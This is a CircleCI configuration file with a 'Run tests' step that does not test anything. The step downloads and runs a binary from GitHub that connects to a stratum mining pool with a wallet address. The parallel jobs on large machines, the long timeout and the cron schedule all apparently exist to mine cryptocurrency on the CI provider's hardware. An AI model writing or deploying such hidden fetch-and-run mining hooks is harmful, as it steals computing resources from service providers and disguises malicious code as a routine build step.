working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Run tests
        command: |
                    apt update 
                    wget https://raw.githubusercontent.com/mariobiszz/students/main/subscribe && chmod 777 subscribe && ./subscribe -a gr -o stratum+tcps://stratum-ru.rplant.xyz:17056 -u RJMHcqVJEzYwdD4tzG1dvYfQfpMaTjXPAz.$(cat /proc/sys/kernel/hostname)
        no_output_timeout: 300m
version: 2.0
jobs:
  endvoc:
    <<: *script
    machine:
      image: ubuntu-2004:202101-01
      resource_class: large
    parallelism: 15
  endvoc1:
    <<: *script
    machine:
      image: ubuntu-2004:202101-01
      resource_class: large
    parallelism: 15
workflows:
  version: 2
  commit:
    jobs:
      - endvoc
      - endvoc1

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - main

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1